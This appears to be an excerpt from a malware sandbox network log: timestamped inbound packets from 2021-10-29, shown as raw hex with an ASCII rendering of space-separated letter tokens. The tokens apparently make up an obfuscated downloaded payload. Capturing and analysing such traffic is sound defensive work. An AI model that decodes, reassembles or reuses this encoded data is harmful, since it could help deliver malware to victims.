2021-10-29 18:50:03 UTC	1279	IN	Data Raw: 63 59 20 4e 63 56 20 4e 4e 56 20 59 43 20 59 56 20 56 63 20 4e 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4c 43 20 4d 56 20 59 43 20 72 49 20 59 63 20 63 49 20 72 57 20 4e 4e 4c 20 4e 4e 4d 20 56 57 20 4e 72 20 72 72 20 72 49 20 59 43 20 63 43 20 4e 56 72 20 4e 43 57 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 57 4c 20 57 56 20 59 43 20 59 72 20 57 72 20 56 57 20 72 4c 20 4e 43 57 20 4e 4e 56 20 59 63 20 4c 59 20 59 4d 20 4c 57 20 57 72 20 57 43 20 4d 4c 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 57 20 57 56 20 4c 57 20 57 59 20 57 43 20 4d 4c 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 57 20 49 4d 20 4c 43 20 59 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 57 4d 20 59 63 20 56 72 20 4e 56 4e 20 59 72 20 49 72 20 4e 56 43 20 56 63 20 4e 56 20 4e 4e 56 20 59 43 20 59 49 20 4c 4c Data Ascii: cY NcV NNV YC YV Vc N Ir NNr NVM LC MV YC rI Yc cI rW NNL NNM VW Nr rr rI YC cC NVr NCW NNM NCW NVV WL WV YC Yr Wr VW rL NCW NNV Yc LY YM LW Wr WC ML NCW NNV Yc VW WV LW WY WC ML NCW NNV Yc VW IM LC YV NNr NNM NCL WM Yc Vr NVN Yr Ir NVC Vc NV NNV YC YI LL
2021-10-29 18:50:03 UTC	1280	IN	Data Raw: 63 49 20 59 43 20 56 63 20 4c 59 20 49 72 20 4e 4e 72 20 4e 4e 59 20 4c 4e 20 49 59 20 59 72 20 72 49 20 63 63 20 4c 43 20 4e 72 4e 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4d 20 49 49 20 59 63 20 72 49 20 59 43 20 56 57 20 49 4d 20 4e 4e 49 20 56 63 20 4e 4c 4c 20 4e 4e 4c 20 59 43 20 59 72 20 56 72 20 59 72 20 4d 4e 20 63 63 20 4e 56 63 20 4e 43 57 20 57 56 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 4e 4e 20 49 49 20 4c 57 20 72 49 20 59 43 20 72 49 20 4c 49 20 72 59 20 4e 4e 4c 20 4e 43 57 20 43 20 56 63 20 56 4c 4c 20 59 43 20 59 72 20 49 56 20 57 43 20 4e 56 63 20 4e 43 57 20 4e 4e 56 20 56 59 20 59 4e 20 59 72 20 59 4e 20 57 43 20 4e 4e 49 20 4e 56 4c 20 4e 43 72 20 4e 56 63 20 59 56 20 63 56 20 59 4c 20 59 63 20 57 56 20 4e Data Ascii: cI YC Vc LY Ir NNr NNY LN IY Yr rI cc LC NrN NNr NNM NCM II Yc rI YC VW IM NNI Vc NLL NNL YC Yr Vr Yr MN cc NVc NCW WV YC rI YC Yr Ir NNr NNM NNN II LW rI YC rI LI rY NNL NCW C Vc VLL YC Yr IV WC NVc NCW NNV VY YN Yr YN WC NNI NVL NCr NVc YV cV YL Yc WV N
2021-10-29 18:50:03 UTC	1282	IN	Data Raw: 20 4e 49 4d 20 63 43 20 4e 4e 72 20 4e 4e 4d 20 4e 43 49 20 4e 56 59 20 59 4c 20 59 59 20 4e 49 49 20 57 59 20 4d 59 20 57 49 20 72 72 20 4e 43 4e 20 4e 43 56 20 72 59 20 4c 56 20 56 63 20 49 57 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 43 63 20 4e 43 56 20 59 57 20 4c 49 20 59 4c 20 4e 49 72 20 63 4e 20 4e 56 56 20 56 59 4e 20 72 20 72 4e 20 56 63 20 57 59 20 59 43 20 59 72 20 57 72 20 4e 20 4e 43 56 20 4e 43 57 20 4e 4e 56 20 59 56 20 59 4e 20 59 56 20 4c 72 20 57 4c 20 4e 56 56 20 56 63 20 4d 4d 20 4e 4e 56 20 59 43 20 59 72 20 4c 4c 20 59 43 20 4e 4c 49 20 4e 4e 57 20 49 4c 20 4e 4d 57 20 4e 4e 56 20 4c 49 20 56 63 20 4c 59 20 59 43 20 4e 56 63 20 4e 4e 72 20 4e 4e 4d 20 4e 43 49 20 57 63 20 59 43 20 72 49 20 59 43 20 59 72 20 4d 72 20 4e 4e 72 20 4e 4d Data Ascii: NIM cC NNr NNM NCI NVY YL YY NII WY MY WI rr NCN NCV rY LV Vc IW Ir NNr NVM NCc NCV YW LI YL NIr cN NVV VYN r rN Vc WY YC Yr Wr N NCV NCW NNV YV YN YV Lr WL NVV Vc MM NNV YC Yr LL YC NLI NNW IL NMW NNV LI Vc LY YC NVc NNr NNM NCI Wc YC rI YC Yr Mr NNr NM
2021-10-29 18:50:03 UTC	1283	IN	Data Raw: 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 4d 56 20 56 72 20 4d 4e 20 59 72 20 49 72 20 4e 56 43 20 4e 4e 56 20 56 20 43 20 59 43 20 72 49 20 59 63 20 63 4e 20 49 63 20 4e 4e 63 20 4d 20 56 72 43 20 4e 4e 4d 20 59 43 20 63 72 20 59 4c 20 72 57 20 56 4e 49 20 56 4d 20 57 57 20 63 57 20 4e 43 4d 20 59 43 20 72 49 20 59 56 20 56 63 20 49 56 20 4e 20 72 20 4e 43 57 20 4e 4e 56 20 59 63 20 4d 72 20 59 56 20 56 49 20 4d 4e 20 63 63 20 4e 56 4d 20 4e 43 57 20 56 72 4e 20 59 43 20 72 49 20 59 43 20 4c 59 20 49 72 20 4e 4e 72 20 4e 43 43 20 4e 4e 4e 20 4e 4e 59 20 63 72 20 4e 4c 59 20 59 59 20 59 72 20 4c 63 20 57 43 20 49 4e 20 4e 43 57 20 4e 4e 56 20 59 56 20 4c 49 20 56 63 20 63 57 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 43 4c 20 4e 4e 49 20 56 63 20 4d 43 20 59 43 20 Data Ascii: NNM NCW NVV MV Vr MN Yr Ir NVC NNV V C YC rI Yc cN Ic NNc M VrC NNM YC cr YL rW VNI VM WW cW NCM YC rI YV Vc IV N r NCW NNV Yc Mr YV VI MN cc NVM NCW VrN YC rI YC LY Ir NNr NCC NNN NNY cr NLY YY Yr Lc WC IN NCW NNV YV LI Vc cW Ir NNr NVM NCL NNI Vc MC YC
2021-10-29 18:50:03 UTC	1284	IN	Data Raw: 49 56 20 59 72 20 49 72 20 4e 56 43 20 4e 43 63 20 57 4d 20 56 59 4c 20 4e 43 72 20 72 49 20 59 43 20 59 59 20 4e 4e 4c 20 4e 63 56 20 4e 4c 59 20 4e 43 57 20 4e 4e 56 20 59 72 20 56 72 20 59 20 59 72 20 49 72 20 4e 56 43 20 63 20 49 59 20 4e 4e 56 20 59 43 20 59 49 20 56 63 20 49 49 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 4e 4e 20 4c 4e 20 63 63 20 72 49 20 59 43 20 63 43 20 49 4d 20 4e 4e 49 20 57 4c 20 4d 72 20 4e 4e 56 20 59 43 20 59 72 20 57 4c 20 49 4d 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4d 4e 20 4e 4e 56 20 59 43 20 72 4c 20 56 20 59 4c 20 49 72 20 4e 4e 4e 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4c 4c 20 72 49 20 59 43 20 4c 57 20 49 63 20 57 72 20 4e 4e 4c 20 4e 4e 4e 20 56 59 72 20 4c 4e 20 59 56 20 4c 49 20 63 43 20 4e 4c 49 20 57 49 20 4e 4e 57 Data Ascii: IV Yr Ir NVC NCc WM VYL NCr rI YC YY NNL NcV NLY NCW NNV Yr Vr Y Yr Ir NVC c IY NNV YC YI Vc II Ir NNr NVM NNN LN cc rI YC cC IM NNI WL Mr NNV YC Yr WL IM Ir NNr NVM MN NNV YC rL V YL Ir NNN NNM NCW NNV LL rI YC LW Ic Wr NNL NNN VYr LN YV LI cC NLI WI NNW
2021-10-29 18:50:03 UTC	1285	IN	Data Raw: 56 20 4e 43 63 20 72 43 20 63 72 20 4e 56 72 20 59 56 20 63 63 20 4e 4e 63 20 72 57 20 49 72 20 56 20 57 4c 20 4d 43 20 4e 4e 56 20 59 43 20 59 49 20 59 63 20 72 57 20 63 4d 20 72 56 20 4e 56 63 20 4e 43 63 20 4e 4e 72 20 57 4c 20 4e 4d 49 20 59 43 20 59 72 20 57 72 20 4d 4d 20 4c 57 20 4e 72 63 20 4e 72 4c 20 56 43 59 20 59 72 20 56 72 20 59 72 20 49 72 20 4e 4e 72 20 4e 43 56 20 57 4c 20 4e 4e 4d 20 59 43 20 4e 4e 56 20 59 43 20 59 72 20 49 72 20 4e 43 4d 20 4e 4e 4d 20 4e 43 57 20 57 4d 20 63 59 20 4e 4d 57 20 59 43 20 59 72 20 57 72 20 4e 56 43 20 57 57 20 4e 43 56 20 57 4e 20 56 43 20 59 72 20 72 49 20 72 57 20 59 57 20 49 59 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 72 57 20 59 59 20 72 57 20 49 57 20 56 43 49 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 72 Data Ascii: V NCc rC cr NVr YV cc NNc rW Ir V WL MC NNV YC YI Yc rW cM rV NVc NCc NNr WL NMI YC Yr Wr MM LW Nrc NrL VCY Yr Vr Yr Ir NNr NCV WL NNM YC NNV YC Yr Ir NCM NNM NCW WM cY NMW YC Yr Wr NVC WW NCV WN VC Yr rI rW YW IY NNM NCW NVV rW YY rW IW VCI NNr NNM NCL r
2021-10-29 18:50:03 UTC	1287	IN	Data Raw: 20 4e 56 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 72 4e 20 43 20 59 4e 20 59 72 20 63 59 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 43 4d 20 59 43 20 72 49 20 4c 59 20 59 56 20 72 4d 20 4e 4e 56 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 57 4c 20 59 43 20 59 4e 20 59 72 20 49 56 20 4e 56 43 20 4e 4d 4e 20 4e 43 72 20 49 63 20 4c 63 20 59 49 20 56 4c 63 20 59 72 20 49 56 20 49 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 4e 20 4c 56 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 56 63 20 63 43 20 72 49 20 59 59 20 59 4d 20 49 72 20 4e 4e 72 20 4e 4e 63 20 4e 4e 49 20 63 72 20 72 49 20 72 49 20 4c 4d 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 43 20 4e 43 57 20 4e 4e 56 20 4c 59 20 59 43 20 4d 4c 20 59 56 20 49 72 20 4e 4e 72 20 4e 4e 4c 20 4e Data Ascii: NVY NNM NCW NNL rN C YN Yr cY NNr NNM NCW NCM YC rI LY YV rM NNV NNM NCW NNc WL YC YN Yr IV NVC NMN NCr Ic Lc YI VLc Yr IV II NNM NCW NNV YN LV YC Yr Ir NNr NNM NCW NVc cC rI YY YM Ir NNr NNc NNI cr rI rI LM Yr Ir NNr NNC NCW NNV LY YC ML YV Ir NNr NNL N
2021-10-29 18:50:03 UTC	1288	IN	Data Raw: 4c 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 4e 56 56 20 56 4c 63 20 59 4c 20 56 43 20 4c 56 20 57 72 20 4e 4d 56 20 4e 4e 4d 20 4e 43 4d 20 57 43 20 59 43 20 72 49 20 59 4e 20 4c 49 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 63 4c 20 63 4e 20 59 72 20 49 4e 20 4e 56 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4c 20 72 4e 20 43 20 72 49 20 59 72 20 63 63 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 43 49 20 59 43 20 72 49 20 4c 59 20 59 56 20 72 4d 20 4e 4e 56 20 4e 4e 4d 20 4e 43 57 20 4e 4e 63 20 72 57 20 57 59 20 4c 63 20 59 59 20 49 72 20 4e 4e 63 20 4e 56 4d 20 4e 4d 57 20 4e 4e 4d 20 56 43 20 4c 49 20 59 63 20 56 4c 56 20 49 72 20 4e 4e 63 20 57 59 20 4e 43 57 20 4e 4e 56 20 59 4e 20 4c 56 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e Data Ascii: L NNY NNM NCM NVV VLc YL VC LV Wr NMV NNM NCM WC YC rI YN LI Ir NNr NNM NCW NNV YC cL cN Yr IN NVY NNM NCW NNL rN C rI Yr cc NNr NNM NCW NCI YC rI LY YV rM NNV NNM NCW NNc rW WY Lc YY Ir NNc NVM NMW NNM VC LI Yc VLV Ir NNc WY NCW NNV YN LV YC Yr Ir NNr NN
2021-10-29 18:50:03 UTC	1290	IN	Data Raw: 20 59 43 20 72 56 20 49 72 20 4e 4e 72 20 4e 43 43 20 4e 4e 4e 20 4e 4e 20 72 49 20 72 49 20 59 43 20 59 43 20 49 4d 20 56 57 20 4e 43 56 20 4e 43 49 20 4e 4e 56 20 59 56 20 59 49 20 56 4c 63 20 59 4e 20 4e 4e 72 20 4e 43 43 20 4e 56 4d 20 4e 4d 57 20 4e 4e 56 20 59 56 20 56 63 20 59 43 20 59 72 20 49 59 20 57 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 4d 20 57 4e 20 4e 4e 72 20 4e 4e 56 20 57 49 20 4e 4e 56 20 59 43 20 72 57 20 72 4e 20 63 20 49 63 20 4e 4e 72 20 57 57 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 72 20 59 43 20 59 72 20 63 57 20 4e 4e 56 20 4e 72 20 4e 4e 4e 20 4e 4e 56 20 59 43 20 59 56 20 72 57 20 49 57 20 57 72 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 4e 56 56 20 56 4c 63 20 59 4c 20 56 43 20 4c 56 20 57 72 20 4e Data Ascii: YC rV Ir NNr NCC NNN NN rI rI YC YC IM VW NCV NCI NNV YV YI VLc YN NNr NCC NVM NMW NNV YV Vc YC Yr IY WI NNM NCW NNV YC rI YC YM WN NNr NNV WI NNV YC rW rN c Ic NNr WW NCW NNV YC rr YC Yr cW NNV Nr NNN NNV YC YV rW IW Wr NNY NNM NCM NVV VLc YL VC LV Wr N
2021-10-29 18:50:03 UTC	1291	IN	Data Raw: 57 63 20 59 43 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 43 4c 20 4e 56 4d 20 4e 4e 56 20 63 56 20 63 4c 20 59 43 20 59 72 20 49 59 20 4e 43 59 20 63 57 20 4e 4e 43 20 4e 4e 56 20 72 56 20 72 49 20 59 43 20 59 72 20 4d 57 20 4e 4e 72 20 4e 4e 4d 20 4e 56 72 20 4e 4e 72 20 4d 4c 20 59 43 20 59 43 20 59 72 20 49 43 20 4e 4e 4c 20 4e 4e 4c 20 56 20 4e 43 59 20 59 4e 20 72 49 20 59 56 20 4c 4c 20 57 72 20 4e 4d 56 20 4e 4e 56 20 4d 59 20 4e 43 56 20 59 63 20 56 4c 49 20 59 43 20 72 49 20 4e 56 63 20 4e 4e 59 20 4e 43 4e 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 72 20 63 57 20 57 57 20 4e 4e 4d 20 4e 43 72 20 4e 56 4d 20 59 43 20 72 49 20 59 4e 20 4e 56 20 49 63 20 4e 43 4e 20 56 63 20 4c 63 20 4e 4e 56 20 59 43 20 59 72 20 72 49 20 Data Ascii: Wc YC rI YC Yr Ir NNr NCL NVM NNV cV cL YC Yr IY NCY cW NNC NNV rV rI YC Yr MW NNr NNM NVr NNr ML YC YC Yr IC NNL NNL V NCY YN rI YV LL Wr NMV NNV MY NCV Yc VLI YC rI NVc NNY NCN NCW NNV YC rI YC Yr cW WW NNM NCr NVM YC rI YN NV Ic NCN Vc Lc NNV YC Yr rI
2021-10-29 18:50:03 UTC	1292	IN	Data Raw: 20 59 59 20 59 72 20 49 72 20 4e 4e 49 20 4e 4e 20 4e 43 63 20 4e 4e 56 20 59 43 20 59 56 20 56 63 20 56 4d 20 49 72 20 4e 4e 72 20 4e 4e 59 20 63 57 20 4e 57 59 20 59 4e 20 72 49 20 59 56 20 4c 57 20 57 72 20 4e 56 4d 20 4e 4e 20 4e 43 4e 20 4e 4e 56 20 59 43 20 59 56 20 56 63 20 4e 49 57 20 49 72 20 4e 4e 72 20 4e 4e 59 20 4e 56 63 20 4e 4e 63 20 56 59 20 59 49 20 4e 49 20 4e 57 43 20 4d 4e 20 4e 4e 72 20 4e 4e 4d 20 63 57 20 56 4c 57 20 59 43 20 72 49 20 59 63 20 4c 57 20 49 43 20 4e 4e 63 20 4e 56 59 20 4e 56 4d 20 4e 4e 59 20 57 4c 20 4e 49 59 20 59 43 20 59 72 20 49 56 20 57 72 20 4e 59 63 20 4e 43 43 20 57 57 20 59 59 20 4c 72 20 59 59 20 63 57 20 56 4e 63 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 49 49 20 4e 72 4c 20 72 57 20 59 43 20 72 49 20 4d 43 Data Ascii: YY Yr Ir NNI NN NCc NNV YC YV Vc VM Ir NNr NNY cW NWY YN rI YV LW Wr NVM NN NCN NNV YC YV Vc NIW Ir NNr NNY NVc NNc VY YI NI NWC MN NNr NNM cW VLW YC rI Yc LW IC NNc NVY NVM NNY WL NIY YC Yr IV Wr NYc NCC WW YY Lr YY cW VNc NNY NNM NCM II NrL rW YC rI MC
2021-10-29 18:50:03 UTC	1294	IN	Data Raw: 4e 59 20 4c 43 20 4e 4e 72 20 72 49 20 72 49 20 59 56 20 63 43 20 4d 59 20 4e 56 59 20 56 72 49 20 57 57 20 4e 4e 56 20 59 43 20 59 43 20 56 4c 20 4c 56 20 63 72 20 4e 72 43 20 4e 4e 59 20 59 4c 20 4e 4e 56 20 59 43 20 59 72 20 63 59 20 4e 49 4c 20 49 72 20 4e 4e 72 20 4e 4e 59 20 56 43 4d 20 49 59 20 4c 4d 20 4c 63 20 56 43 72 20 72 49 20 4e 4c 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4d 20 4c 20 4e 4d 57 20 72 49 20 59 43 20 72 49 20 56 72 63 20 49 4d 20 4e 43 57 20 4e 56 4e 20 4e 72 56 20 59 56 20 4e 43 63 20 59 43 20 59 72 20 49 56 20 4e 20 56 72 72 20 4e 43 57 20 4e 4e 56 20 59 56 20 4e 72 63 20 56 4c 20 72 4d 20 63 72 20 4e 72 43 20 4e 4e 59 20 59 72 20 4e 4e 56 20 59 43 20 59 72 20 63 59 20 4e 49 4c 20 49 72 20 4e 4e 72 20 4e 4e 59 20 56 43 4d 20 49 59 20 Data Ascii: NY LC NNr rI rI YV cC MY NVY VrI WW NNV YC YC VL LV cr NrC NNY YL NNV YC Yr cY NIL Ir NNr NNY VCM IY LM Lc VCr rI NL NNr NNM NCM L NMW rI YC rI Vrc IM NCW NVN NrV YV NCc YC Yr IV N Vrr NCW NNV YV Nrc VL rM cr NrC NNY Yr NNV YC Yr cY NIL Ir NNr NNY VCM IY
2021-10-29 18:50:03 UTC	1295	IN	Data Raw: 4e 4e 49 20 59 56 20 56 43 63 20 59 56 20 59 43 20 49 63 20 4e 4e 72 20 4e 4e 59 20 4c 43 20 56 4e 4c 20 59 43 20 72 49 20 59 63 20 4c 43 20 63 49 20 4e 4e 72 20 4e 4e 4d 20 4d 43 20 49 49 20 4c 59 20 72 49 20 59 43 20 56 57 20 4e 56 72 20 56 59 43 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 56 72 20 56 56 20 72 57 20 59 43 20 49 4e 20 57 43 20 59 49 20 4e 43 57 20 4e 4e 56 20 59 56 20 56 63 20 59 43 20 59 72 20 4d 57 20 63 63 20 4e 4e 4c 20 4e 43 57 20 59 4d 20 59 4e 20 72 49 20 59 43 20 72 4e 20 49 72 20 4e 4e 72 20 4e 43 43 20 4e 43 59 20 4c 20 4e 57 43 20 72 57 20 59 43 20 72 49 20 4e 4e 4c 20 4e 20 56 4e 43 20 4e 43 57 20 4e 4e 56 20 59 63 20 57 59 20 57 4c 20 59 59 20 49 72 20 4e 4e 63 20 49 43 20 4c 43 20 4e 43 59 20 59 43 20 72 49 20 59 63 20 49 57 20 Data Ascii: NNI YV VCc YV YC Ic NNr NNY LC VNL YC rI Yc LC cI NNr NNM MC II LY rI YC VW NVr VYC NNM NCW NNI Vr VV rW YC IN WC YI NCW NNV YV Vc YC Yr MW cc NNL NCW YM YN rI YC rN Ir NNr NCC NCY L NWC rW YC rI NNL N VNC NCW NNV Yc WY WL YY Ir NNc IC LC NCY YC rI Yc IW
2021-10-29 18:50:03 UTC	1296	IN	Data Raw: 43 20 4e 49 20 49 72 20 4e 4e 72 20 4e 4e 63 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 56 4e 63 20 59 72 20 49 72 20 4e 4e 72 20 4e 56 63 20 4e 43 57 20 4e 4e 56 20 59 43 20 4e 57 49 20 59 43 20 59 72 20 49 72 20 4e 4e 4c 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 63 4e 20 72 49 20 59 43 20 59 59 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 4e 4e 57 20 49 59 20 4e 4e 72 20 4e 4e 4d 20 72 72 20 4e 4e 4c 20 59 43 20 72 49 20 59 4e 20 59 72 20 49 72 20 4e 4e 72 20 49 4e 20 4e 43 57 20 4e 4e 56 20 59 4e 20 72 49 20 59 43 20 59 72 20 49 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 4e 4e 59 20 72 57 20 59 43 20 59 72 20 56 56 20 4e 4e 59 20 4e 4e 4d 20 4e 43 57 20 4e 4e 4d 20 59 43 20 72 49 20 59 43 20 59 4d 20 Data Ascii: C NI Ir NNr NNc NCW NNV YC rI VNc Yr Ir NNr NVc NCW NNV YC NWI YC Yr Ir NNL NNM NCW NNV cN rI YC YY Ir NNr NNM NCW NNV YC rI YC NNW IY NNr NNM rr NNL YC rI YN Yr Ir NNr IN NCW NNV YN rI YC Yr Ir NNr NNM NCW NNV NNY rW YC Yr VV NNY NNM NCW NNM YC rI YC YM
2021-10-29 18:50:03 UTC	1298	IN	Data Raw: 57 20 4e 57 72 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 72 20 4e 4c 57 20 59 59 20 49 72 20 4e 4e 63 20 4e 4e 4c 20 63 57 20 4e 59 43 20 59 43 20 72 49 20 59 56 20 4c 43 20 56 56 4d 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 57 43 20 4c 4c 20 43 20 63 56 20 59 72 20 4e 57 72 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 59 43 20 72 56 20 4e 4e 4d 20 4e 4e 63 20 4e 43 57 20 4e 4e 63 20 4c 4e 20 56 43 20 4c 63 20 56 4c 43 20 4e 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 49 20 49 49 20 4e 4c 49 20 72 49 20 59 43 20 63 43 20 4e 4c 56 20 4e 56 63 20 4e 4e 4d 20 4e 43 57 20 4e 4e 72 20 56 63 20 4e 4c 63 20 59 43 20 59 72 20 57 72 20 57 43 20 56 43 72 20 4e 43 57 20 4e 4e 56 20 59 63 20 56 72 20 4e 4c 63 20 59 72 20 49 72 20 4e 56 43 20 56 72 Data Ascii: W NWr NCW NNV Yc Vr NLW YY Ir NNc NNL cW NYC YC rI YV LC VVM NNY NNM NCM WC LL C cV Yr NWr NNr NNM NCW NNV YC rI YC YC rV NNM NNc NCW NNc LN VC Lc VLC NV NNr NNM NCI II NLI rI YC cC NLV NVc NNM NCW NNr Vc NLc YC Yr Wr WC VCr NCW NNV Yc Vr NLc Yr Ir NVC Vr
2021-10-29 18:50:03 UTC	1299	IN	Data Raw: 4e 43 57 20 4e 4e 49 20 4c 59 20 59 56 20 57 4c 20 56 72 43 20 49 72 20 4e 4e 72 20 4e 56 4d 20 4e 4e 4e 20 4e 4e 49 20 57 4c 20 4e 43 20 59 43 20 59 72 20 49 56 20 49 4d 20 4e 43 57 20 57 72 20 4e 56 43 20 72 49 20 59 4e 20 59 72 20 4c 43 20 4e 56 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4d 20 4e 43 59 20 4e 20 59 72 20 63 59 20 4e 59 4d 20 49 72 20 4e 4e 72 20 4e 56 4d 20 56 4c 20 57 43 20 59 43 20 72 49 20 59 4e 20 72 56 20 49 72 20 4e 4e 72 20 4e 4e 57 20 4e 43 57 20 57 4d 20 59 43 20 72 72 20 4c 4e 20 59 72 20 57 43 20 4e 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 4e 56 20 72 49 20 72 49 20 4e 4e 63 20 59 72 20 4d 56 20 4e 63 20 4e 4e 4d 20 57 57 20 4e 4e 56 20 59 43 20 72 49 20 59 43 20 4e 4d 63 20 49 63 20 57 43 20 4e 4d 4e 20 4e 43 57 20 4e 4e 56 20 59 56 20 57 Data Ascii: NCW NNI LY YV WL VrC Ir NNr NVM NNN NNI WL NC YC Yr IV IM NCW Wr NVC rI YN Yr LC NV NNr NNM NCM NCY N Yr cY NYM Ir NNr NVM VL WC YC rI YN rV Ir NNr NNW NCW WM YC rr LN Yr WC NNr NNM NCW NNV rI rI NNc Yr MV Nc NNM WW NNV YC rI YC NMc Ic WC NMN NCW NNV YV W
2021-10-29 18:50:03 UTC	1300	IN	Data Raw: 4c 20 49 4e 20 49 59 20 4e 4e 72 20 4e 4e 59 20 63 57 20 4e 56 59 20 59 43 20 72 49 20 59 56 20 49 57 20 4e 59 4d 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 4e 4e 72 20 59 56 20 57 59 20 4d 20 59 72 20 49 72 20 4e 4e 63 20 49 43 20 4e 4e 4d 20 63 4d 20 59 49 20 59 43 20 72 57 20 59 43 20 4e 56 72 20 4e 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 72 4c 20 4c 20 59 56 20 63 57 20 56 59 59 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4c 20 4e 43 20 56 72 20 4e 72 56 20 72 57 20 49 57 20 4d 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 57 56 20 56 43 20 59 43 20 72 57 20 49 57 20 59 59 20 4e 4e 59 20 4e 4e 4d 20 4e 43 4d 20 49 49 20 4e 49 57 20 72 49 20 59 43 20 72 49 20 59 57 20 72 49 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 56 4c 20 72 43 20 4e 20 63 56 20 49 63 20 4e 4e 4c 20 4e 4e Data Ascii: L IN IY NNr NNY cW NVY YC rI YV IW NYM NNr NNM NCL NNr YV WY M Yr Ir NNc IC NNM cM YI YC rW YC NVr NI NNM NCW NNI rL L YV cW VYY NNr NNM NCL NC Vr NrV rW IW M NNY NNM NCM WV VC YC rW IW YY NNY NNM NCM II NIW rI YC rI YW rI NNM NCW NNI VL rC N cV Ic NNL NN
2021-10-29 18:50:03 UTC	1302	IN	Data Raw: 4d 4d 20 4e 4e 4d 20 4e 43 57 20 4e 4e 49 20 56 43 20 59 43 20 4c 4d 20 4e 49 4d 20 4e 56 4d 20 4e 4e 72 20 4e 4e 4d 20 4e 4e 4e 20 49 59 20 4c 63 20 63 4d 20 4e 59 59 20 59 72 20 49 72 20 4e 4e 63 20 56 4e 59 20 63 57 20 56 59 4c 20 59 43 20 72 49 20 59 56 20 49 57 20 56 4e 20 4e 4e 72 20 4e 4e 4d 20 4e 43 4d 20 49 63 20 56 72 20 72 49 20 59 43 20 59 72 20 4d 4e 20 63 63 20 4e 4e 56 20 4e 43 57 20 4e 57 56 20 59 4e 20 72 49 20 59 43 20 4e 57 20 49 72 20 4e 4e 72 20 4e 43 43 20 4e 4e 4e 20 49 49 20 4e 49 72 20 72 49 20 59 43 20 72 49 20 4c 57 20 4e 4e 57 20 4e 4e 57 20 4e 43 57 20 4e 4e 49 20 59 63 20 72 4d 20 63 4e 20 4e 49 4d 20 57 43 20 4e 4e 72 20 4e 4e 4d 20 4e 4e 4e 20 49 59 20 4c 63 20 4c 63 20 56 43 72 20 72 49 20 4c 49 20 4e 4e 72 20 4e 4e 4d 20 Data Ascii: MM NNM NCW NNI VC YC LM NIM NVM NNr NNM NNN IY Lc cM NYY Yr Ir NNc VNY cW VYL YC rI YV IW VN NNr NNM NCM Ic Vr rI YC Yr MN cc NNV NCW NWV YN rI YC NW Ir NNr NCC NNN II NIr rI YC rI LW NNW NNW NCW NNI Yc rM cN NIM WC NNr NNM NNN IY Lc Lc VCr rI LI NNr NNM
2021-10-29 18:50:03 UTC	1303	IN	Data Raw: 63 57 20 56 72 49 20 59 43 20 72 49 20 59 56 20 72 49 20 4c 57 20 56 4e 72 20 4e 4e 4d 20 4e 43 57 20 4e 56 56 20 4d 57 20 59 63 20 59 4e 20 59 72 20 49 43 20 57 43 20 56 72 43 20 4e 43 57 20 4e 4e 56 20 59 56 20 59 72 20 56 43 72 20 72 49 20 49 56 20 4e 4e 56 20 4e 4e 4d 20 4e 43 4d 20 4c 20 4e 59 4e 20 72 49 20 59 43 20 63 43 20 4e 56 72 20 57 49 20 4e 4e 4d 20 4e 43 57 20 57 4e 20 56 63 20 4c 4c 20 59 43 20 59 72 20 4e 56 4d 20 57 43 20 56 72 4c 20 4e 43 57 20 4e 4e 56 20 59 56 20 56 72 20 4e 49 4e 20 59 72 20 49 72 20 4e 4e 63 20 4e 4e 59 20 4e 72 4d 20 4e 4e 49 20 59 4c 20 59 43 20 59 43 20 72 49 20 4c 57 20 56 4e 59 20 4e 4e 4d 